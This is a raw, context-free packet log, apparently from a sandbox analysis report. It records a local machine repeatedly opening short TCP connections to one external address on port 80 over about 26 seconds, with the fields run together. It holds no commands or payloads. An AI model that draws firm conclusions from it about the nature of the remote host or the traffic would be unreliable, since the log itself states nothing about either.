      Jan 11, 2021 17:56:27.859379053 CET8049936210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:27.859472990 CET4993680192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:27.860194921 CET4993680192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:28.120748043 CET8049936210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:28.120865107 CET4993680192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:28.121062994 CET4993680192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:28.125463963 CET4993780192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:28.380964041 CET8049936210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:28.390747070 CET8049937210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:28.390868902 CET4993780192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:28.391552925 CET4993780192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:28.653543949 CET8049937210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:28.653750896 CET4993780192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:28.654292107 CET4993780192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:28.661047935 CET4993880192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:28.915376902 CET8049937210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:28.922681093 CET8049938210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:28.922918081 CET4993880192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:28.923845053 CET4993880192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:29.186045885 CET8049938210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:29.186323881 CET4993880192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:29.186597109 CET4993880192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:29.301250935 CET4993980192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:29.448096037 CET8049938210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:29.570440054 CET8049939210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:29.570703983 CET4993980192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:29.571549892 CET4993980192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:29.841411114 CET8049939210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:29.841626883 CET4993980192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:29.841773987 CET4993980192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:29.847527027 CET4994080192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:30.107901096 CET8049940210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:30.108055115 CET4994080192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:30.108763933 CET4994080192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:30.110491037 CET8049939210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:30.369923115 CET8049940210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:30.370136976 CET4994080192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:30.370306015 CET4994080192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:30.374305964 CET4994180192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:30.630182028 CET8049940210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:30.642848015 CET8049941210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:30.643079996 CET4994180192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:30.643855095 CET4994180192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:30.913028002 CET8049941210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:30.913243055 CET4994180192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:30.913366079 CET4994180192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:31.034302950 CET4994280192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:31.181726933 CET8049941210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:31.295895100 CET8049942210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:31.295990944 CET4994280192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:31.297410965 CET4994280192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:31.559371948 CET8049942210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:31.559640884 CET4994280192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:31.559787989 CET4994280192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:31.564624071 CET4994380192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:31.821093082 CET8049942210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:31.826174974 CET8049943210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:31.826405048 CET4994380192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:31.827218056 CET4994380192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:32.089320898 CET8049943210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:32.089624882 CET4994380192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:32.089822054 CET4994380192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:32.096666098 CET4994480192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:32.351043940 CET8049943210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:32.359664917 CET8049944210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:32.360127926 CET4994480192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:32.360671997 CET4994480192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:32.624397993 CET8049944210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:32.624672890 CET4994480192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:32.624862909 CET4994480192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:32.741729021 CET4994580192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:32.888427973 CET8049944210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:33.003201962 CET8049945210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:33.003434896 CET4994580192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:33.004050016 CET4994580192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:33.266020060 CET8049945210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:33.266135931 CET4994580192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:33.266288996 CET4994580192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:33.270010948 CET4994680192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:33.527478933 CET8049945210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:33.530215025 CET8049946210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:33.530360937 CET4994680192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:33.530864000 CET4994680192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:33.791635990 CET8049946210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:33.791738033 CET4994680192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:33.791904926 CET4994680192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:33.796858072 CET4994780192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:34.052010059 CET8049946210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:34.057538986 CET8049947210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:34.057709932 CET4994780192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:34.059333086 CET4994780192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:34.320563078 CET8049947210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:34.321110964 CET4994780192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:34.321263075 CET4994780192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:34.445116043 CET4994880192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:34.582029104 CET8049947210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:34.714452028 CET8049948210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:34.714669943 CET4994880192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:34.716017008 CET4994880192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:34.985666990 CET8049948210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:34.985949039 CET4994880192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:34.986185074 CET4994880192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:34.992805958 CET4994980192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:35.252906084 CET8049949210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:35.253252983 CET4994980192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:35.254631042 CET4994980192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:35.254868984 CET8049948210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:35.514945984 CET8049949210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:35.515084982 CET4994980192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:35.515216112 CET4994980192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:35.519566059 CET4995080192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:35.774858952 CET8049949210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:35.782080889 CET8049950210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:35.782356977 CET4995080192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:35.783725977 CET4995080192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:36.047019005 CET8049950210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:36.047342062 CET4995080192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:36.047590017 CET4995080192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:36.160768032 CET4995180192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:36.309757948 CET8049950210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:36.430927038 CET8049951210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:36.431135893 CET4995180192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:36.432792902 CET4995180192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:36.702572107 CET8049951210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:36.702650070 CET4995180192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:36.702897072 CET4995180192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:36.707779884 CET4995280192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:36.968276978 CET8049952210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:36.968375921 CET4995280192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:36.969227076 CET4995280192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:36.972076893 CET8049951210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:37.230433941 CET8049952210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:37.230690002 CET4995280192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:37.230926037 CET4995280192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:37.255346060 CET4995380192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:37.491331100 CET8049952210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:37.515933037 CET8049953210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:37.517848969 CET4995380192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:37.518347025 CET4995380192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:37.779186964 CET8049953210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:37.779525042 CET4995380192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:37.779692888 CET4995380192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:37.898192883 CET4995480192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:38.039789915 CET8049953210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:38.168044090 CET8049954210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:38.168354034 CET4995480192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:38.169698954 CET4995480192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:38.439538956 CET8049954210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:38.439702988 CET4995480192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:38.439920902 CET4995480192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:38.447149992 CET4995580192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:38.708583117 CET8049955210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:38.708695889 CET8049954210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:38.708911896 CET4995580192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:38.710355997 CET4995580192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:38.972512007 CET8049955210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:38.972856045 CET4995580192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:38.973108053 CET4995580192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:38.980259895 CET4995680192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:39.234100103 CET8049955210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:39.252450943 CET8049956210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:39.252578020 CET4995680192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:39.254369020 CET4995680192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:39.526974916 CET8049956210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:39.527070999 CET4995680192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:39.527256012 CET4995680192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:39.644298077 CET4995780192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:39.798935890 CET8049956210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:39.905900955 CET8049957210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:39.906276941 CET4995780192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:39.907459021 CET4995780192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:40.168960094 CET8049957210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:40.169261932 CET4995780192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:40.169560909 CET4995780192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:40.175643921 CET4995880192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:40.430335045 CET8049957210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:40.439835072 CET8049958210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:40.442981005 CET4995880192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:40.446316004 CET4995880192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:40.711049080 CET8049958210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:40.711450100 CET4995880192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:40.711671114 CET4995880192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:40.719280958 CET4995980192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:40.975430965 CET8049958210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:40.980113029 CET8049959210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:40.980309010 CET4995980192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:40.981667042 CET4995980192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:41.243006945 CET8049959210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:41.243364096 CET4995980192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:41.243508101 CET4995980192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:41.372118950 CET4996080192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:41.504072905 CET8049959210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:41.633158922 CET8049960210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:41.633445024 CET4996080192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:41.634579897 CET4996080192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:41.895843029 CET8049960210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:41.895981073 CET4996080192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:41.896224976 CET4996080192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:41.902432919 CET4996180192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:42.156639099 CET8049960210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:42.164562941 CET8049961210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:42.164665937 CET4996180192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:42.165972948 CET4996180192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:42.428543091 CET8049961210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:42.428621054 CET4996180192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:42.428823948 CET4996180192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:42.432243109 CET4996280192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:42.690459013 CET8049962210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:42.690658092 CET8049961210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:42.690812111 CET4996280192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:42.691966057 CET4996280192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:42.950965881 CET8049962210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:42.951056004 CET4996280192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:42.951220036 CET4996280192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:43.072571993 CET4996380192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:43.209228039 CET8049962210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:43.335233927 CET8049963210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:43.335509062 CET4996380192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:43.336865902 CET4996380192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:43.599865913 CET8049963210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:43.600123882 CET4996380192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:43.600361109 CET4996380192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:43.607605934 CET4996480192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:43.862586975 CET8049963210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:43.868267059 CET8049964210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:43.868643999 CET4996480192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:43.869934082 CET4996480192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:44.131026983 CET8049964210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:44.131310940 CET4996480192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:44.131613970 CET4996480192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:44.164891005 CET4996580192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:44.391944885 CET8049964210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:44.426996946 CET8049965210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:44.427177906 CET4996580192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:44.427678108 CET4996580192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:44.690043926 CET8049965210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:44.690182924 CET4996580192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:44.690707922 CET4996580192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:44.805815935 CET4996680192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:44.952737093 CET8049965210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:45.063966036 CET8049966210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:45.064090967 CET4996680192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:45.065449953 CET4996680192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:45.324115038 CET8049966210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:45.324341059 CET4996680192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:45.324594021 CET4996680192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:45.331145048 CET4996780192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:45.582288027 CET8049966210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:45.591911077 CET8049967210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:45.595408916 CET4996780192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:45.596781015 CET4996780192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:45.858217001 CET8049967210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:45.859244108 CET4996780192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:45.892687082 CET4996780192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:45.895534992 CET4996880192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:46.151932001 CET8049968210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:46.152215004 CET4996880192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:46.153100967 CET4996880192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:46.153297901 CET8049967210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:46.409792900 CET8049968210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:46.409984112 CET4996880192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:46.410207987 CET4996880192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:46.523684025 CET4996980192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:46.666134119 CET8049968210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:46.790422916 CET8049969210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:46.790725946 CET4996980192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:46.829166889 CET4996980192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:47.096776962 CET8049969210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:47.097031116 CET4996980192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:47.097254038 CET4996980192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:47.101547003 CET4997080192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:47.363529921 CET8049969210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:47.363579988 CET8049970210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:47.363853931 CET4997080192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:47.519306898 CET4997080192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:47.781912088 CET8049970210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:47.782090902 CET4997080192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:47.901712894 CET4997080192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:47.905128956 CET4997180192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:48.163491011 CET8049970210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:48.174604893 CET8049971210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:48.174798012 CET4997180192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:48.175436020 CET4997180192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:48.446273088 CET8049971210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:48.446420908 CET4997180192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:48.446685076 CET4997180192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:48.568480015 CET4997280192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:48.715831995 CET8049971210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:48.828990936 CET8049972210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:48.829293966 CET4997280192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:48.830677986 CET4997280192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:49.091150045 CET8049972210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:49.091542006 CET4997280192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:49.091748953 CET4997280192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:49.098973036 CET4997380192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:49.351325035 CET8049972210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:49.363379955 CET8049973210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:49.363615990 CET4997380192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:49.365000010 CET4997380192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:49.629981041 CET8049973210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:49.630352974 CET4997380192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:49.630521059 CET4997380192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:49.637825012 CET4997480192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:49.894679070 CET8049973210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:49.898964882 CET8049974210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:49.899383068 CET4997480192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:49.900779009 CET4997480192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:50.162297010 CET8049974210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:50.162518024 CET4997480192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:50.162801027 CET4997480192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:50.274938107 CET4997580192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:50.423285961 CET8049974210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:50.535830021 CET8049975210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:50.536118031 CET4997580192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:50.537497997 CET4997580192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:50.798779011 CET8049975210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:50.798882008 CET4997580192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:50.799190998 CET4997580192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:50.803224087 CET4997680192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:51.059627056 CET8049975210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:51.065454006 CET8049976210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:51.065658092 CET4997680192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:51.066354036 CET4997680192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:51.329032898 CET8049976210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:51.331746101 CET4997680192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:51.331938982 CET4997680192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:51.338699102 CET4997780192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:51.593822956 CET8049976210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:51.601352930 CET8049977210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:51.601703882 CET4997780192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:51.603130102 CET4997780192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:51.866241932 CET8049977210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:51.869525909 CET4997780192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:51.869883060 CET4997780192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:51.991848946 CET4997880192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:52.132365942 CET8049977210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:52.262501955 CET8049978210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:52.262820005 CET4997880192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:52.263866901 CET4997880192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:52.534707069 CET8049978210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:52.535018921 CET4997880192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:52.535310984 CET4997880192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:52.542701006 CET4997980192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:52.801954985 CET8049979210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:52.802259922 CET4997980192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:52.803566933 CET4997980192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:52.805335999 CET8049978210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:53.063415051 CET8049979210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:53.063558102 CET4997980192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:53.063844919 CET4997980192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:53.071428061 CET4998080192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:53.322707891 CET8049979210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:53.333473921 CET8049980210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:53.333702087 CET4998080192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:53.335024118 CET4998080192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:53.597409964 CET8049980210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:53.597496986 CET4998080192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:53.597841978 CET4998080192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:53.711766958 CET4998180192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:53.859447002 CET8049980210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:53.971752882 CET8049981210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:53.971864939 CET4998180192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:53.972723961 CET4998180192.168.2.4210.116.91.80
      Jan 11, 2021 17:56:54.233335018 CET8049981210.116.91.80192.168.2.4
      Jan 11, 2021 17:56:54.233619928 CET4998180192.168.2.4210.116.91.80
